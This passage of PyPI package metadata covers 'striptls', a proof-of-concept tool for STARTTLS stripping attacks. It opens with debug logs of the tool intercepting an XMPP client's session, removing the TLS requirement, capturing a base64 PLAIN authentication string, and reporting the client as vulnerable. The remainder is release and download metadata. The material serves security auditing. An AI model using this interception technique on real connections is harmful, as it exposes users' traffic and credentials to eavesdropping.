from='jabber.ccc.de' version='1.0' xml:lang='en'>\"\n        - DEBUG    - <Session 0x7f083196a910> [client] <= [server]          \"<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls></stream:features>\"\n        - DEBUG    - <Session 0x7f083196a910> [client] <= [server][mangled] \"<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/></stream:features>\"\n        - DEBUG    - <Session 0x7f083196a910> [client] => [server]          \"<iq type='get' id='purplecfe2ee07'><query xmlns='jabber:iq:auth'><username>tin</username></query></iq>\"\n        - DEBUG    - <Session 0x7f083196a910> [client] <= [server]          \"<stream:error><policy-violation xmlns='urn:ietf:params:xml:ns:xmpp-streams'></policy-violation><text xml:lang='' xmlns='urn:ietf:params:xml:ns:xmpp-streams'>Use of STARTTLS required</text></stream:error></stream:stream>\"\n        - WARNING  - <Session 0x7f083196a910> terminated.\n\nXMPP.StripUntrustedIntercept - TLS Interception inbound and outbound with own certificate/key\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n::\n\n        - DEBUG    - <ProtocolDetect 0x7f083196aa90 protocol_id=PROTO_XMPP len_history=0> - protocol detected (target port)\n        - INFO     - <Session 0x7f083196a8d0> client ('192.168.139.1', 56892) has connected\n        - INFO     - <Session 0x7f083196a8d0> connecting to target ('jabber.ccc.de', 5222)\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          \"<?xml version='1.0' ?><stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>\"\n        - DEBUG    - <RewriteDispatcher  - changed mangle: striptls.UntrustedIntercept new: True>\n        - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server]          \"<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='10051743579572304948' from='jabber.ccc.de' version='1.0' xml:lang='en'><stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'><required/></starttls></stream:features>\"\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\n        - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server][mangled] \"<proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\n        - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server][mangled] waiting for inbound SSL Handshake\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server][mangled] performing outbound SSL handshake\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server][mangled] None\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          '<'\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          \"stream:stream to='jabber.ccc.de' xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' version='1.0'>\"\n        - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server]          \"<?xml version='1.0'?><stream:stream xmlns='jabber:client' xmlns:stream='http://etherx.jabber.org/streams' id='6938642107398534259' from='jabber.ccc.de' version='1.0' xml:lang='en'>\"\n        - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server]          \"<stream:features><c xmlns='http://jabber.org/protocol/caps' hash='sha-1' node='http://www.process-one.net/en/ejabberd/' ver='bvEOjW9q8CEw8mw8ecNTLXvY5WQ='/><register xmlns='http://jabber.org/features/iq-register'/><mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><mechanism>PLAIN</mechanism><mechanism>X-OAUTH2</mechanism><mechanism>SCRAM-SHA-1</mechanism></mechanisms></stream:features>\"\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          '<'\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          \"auth xmlns='urn:ietf:params:xml:ns:xmpp-sasl' mechanism='PLAIN' xmlns:ga='http://www.google.com/talk/protocol/auth' ga:client-uses-full-bind-result='true'>AHRpbgB4eA==</auth>\"\n        - DEBUG    - <Session 0x7f083196a8d0> [client] <= [server]          \"<failure xmlns='urn:ietf:params:xml:ns:xmpp-sasl'><not-authorized/></failure>\"\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          '<'\n        - DEBUG    - <Session 0x7f083196a8d0> [client] => [server]          '/stream:stream>'\n        - WARNING  - <Session 0x7f083196a8d0> terminated.\n\nXMPP Audit results\n^^^^^^^^^^^^^^^^^^\n\n::\n\n        - WARNING  - Ctrl C - Stopping server\n        - INFO     -  -- audit results --\n        - INFO     - [*] client: 192.168.139.1\n        - INFO     -     [Vulnerable!] <class striptls.StripInboundTLS at 0x7f08319a6808>\n        - INFO     -     [Vulnerable!] <class striptls.StripFromCapabilities at 0x7f08319a67a0>\n        - INFO     -     [Vulnerable!] <class striptls.UntrustedIntercept at 0x7f08319a6870>\n\n",
        "description_content_type": null,
        "docs_url": null,
        "download_url": "https://github.com/tintinweb/striptls/tarball/v0.5",
        "downloads": {
            "last_day": -1,
            "last_month": -1,
            "last_week": -1
        },
        "home_page": "https://github.com/tintinweb/striptls/",
        "keywords": "striptls",
        "license": "GPLv2",
        "maintainer": "",
        "maintainer_email": "",
        "name": "striptls",
        "package_url": "https://pypi.org/project/striptls/",
        "platform": "",
        "project_url": "https://pypi.org/project/striptls/",
        "project_urls": {
            "Download": "https://github.com/tintinweb/striptls/tarball/v0.5",
            "Homepage": "https://github.com/tintinweb/striptls/"
        },
        "release_url": "https://pypi.org/project/striptls/0.5/",
        "requires_dist": null,
        "requires_python": "",
        "summary": "poc implementation of STARTTLS stripping attacks",
        "version": "0.5"
    },
    "last_serial": 3037952,
    "releases": {
        "0.1": [
            {
                "comment_text": "",
                "digests": {
                    "md5": "efad4291dee66c1a3757aad374230779",
                    "sha256": "27891c84bd5e7ea08eb98d8a9bb954d715d2a52a10ce5f89e6ef7055d9dce787"
                },
                "downloads": -1,
                "filename": "striptls-0.1.tar.gz",
                "has_sig": false,
                "md5_digest": "efad4291dee66c1a3757aad374230779",
                "packagetype": "sdist",
                "python_version": "source",
                "requires_python": null,
                "size": 12399,
                "upload_time": "2016-02-02T21:59:16",
                "url": "https://files.pythonhosted.org/packages/37/9f/12f9de3b585552c14b792e867e632b1c1575b0db40b934d64f70742b2bd8/striptls-0.1.tar.gz"
            }
        ],
        "0.2": [
            {
                "comment_text": "",
                "digests": {
                    "md5": "a0beb2aad857af6be3a9f09d9a690e5c",
                    "sha256": "a220098d398067f583b35d1d91a729c3ffa7af043f329fff0f97c3d52448631c"
                },
                "downloads": -1,
                "filename": "striptls-0.2.tar.gz",
                "has_sig": false,
                "md5_digest": "a0beb2aad857af6be3a9f09d9a690e5c",
                "packagetype": "sdist",
                "python_version": "source",
                "requires_python": null,
                "size": 20253,
                "upload_time": "2016-02-10T21:39:59",
                "url": "https://files.pythonhosted.org/packages/35/9f/ade542418ca26e63e1f0425707986a75ecc21030c992cc2bee17b0909448/striptls-0.2.tar.gz"
            }
        ],
        "0.3": [
            {
                "comment_text": "",
                "digests": {
                    "md5": "9178ee5709cd974acce3e0cd89f9285a",
                    "sha256": "f5ef8ec354d6421379394fe68407344376da7a7df5a0ef385ee77dd7dd72c115"
                },
                "downloads": -1,
                "filename": "striptls-0.3.tar.gz",
                "has_sig": false,
                "md5_digest": "9178ee5709cd974acce3e0cd89f9285a",
                "packagetype": "sdist",
                "python_version": "source",
                "requires_python": null,
                "size": 23729,
                "upload_time": "2016-03-20T19:28:47",
                "url": "https://files.pythonhosted.org/packages/ab/2d/33eb85d77813d3463452852cd08ce0b87d119e4bcc788505f4e3f84da280/striptls-0.3.tar.gz"
            }
        ],
        "0.4": [
            {
                "comment_text": "",
                "digests": {
                    "md5": "a65816b42f005603c071de63108fed17",
                    "sha256": "261719691e418d105002f2cfd208e0514d45cab97ab6aa891432141426c9295d"
                },
                "downloads": -1,
                "filename": "striptls-0.4.tar.gz",
                "has_sig": false,
                "md5_digest": "a65816b42f005603c071de63108fed17",
                "packagetype": "sdist",
                "python_version": "source",
                "requires_python": null,
                "size": 25676,
                "upload_time": "2016-05-15T21:08:23",
                "url": "https://files.pythonhosted.org/packages/2d/cc/13f5b9481e66aad603741cf1789c8ccc5dca1bcd527a3f9f494d27f3e1c5/striptls-0.4.tar.gz"
            }
        ],
        "0.5": [
            {
                "comment_text": "",
                "digests": {
                    "md5": "a8ec8d65d7d83ecb81ffc6eef15c242f",
                    "sha256": "22c1090db58e3188f844e30be2afa404cbc7f1c2c8bc13a2a03092c2071ce3fd"
                },
                "downloads": -1,
                "filename": "striptls-0.5.tar.gz",
                "has_sig": false,
                "md5_digest": "a8ec8d65d7d83ecb81ffc6eef15c242f",
                "packagetype": "sdist",
                "python_version": "source",
                "requires_python": null,
                "size": 26495,
                "upload_time": "2017-07-20T22:01:35",
                "url": "https://files.pythonhosted.org/packages/04/65/5853870ee3196b993ec016605cf17ed1506104f31dd2765133cbe0637b60/striptls-0.5.tar.gz"
            }
        ]
    },
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "md5": "a8ec8d65d7d83ecb81ffc6eef15c242f",
                "sha256": "22c1090db58e3188f844e30be2afa404cbc7f1c2c8bc13a2a03092c2071ce3fd"
            },
            "downloads": -1,
            "filename": "striptls-0.5.tar.gz",
            "has_sig": false,
            "md5_digest": "a8ec8d65d7d83ecb81ffc6eef15c242f",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 26495,
            "upload_time": "2017-07-20T22:01:35",
            "url": "https://files.pythonhosted.org/packages/04/65/5853870ee3196b993ec016605cf17ed1506104f31dd2765133cbe0637b60/striptls-0.5.tar.gz"
        }
    ]
}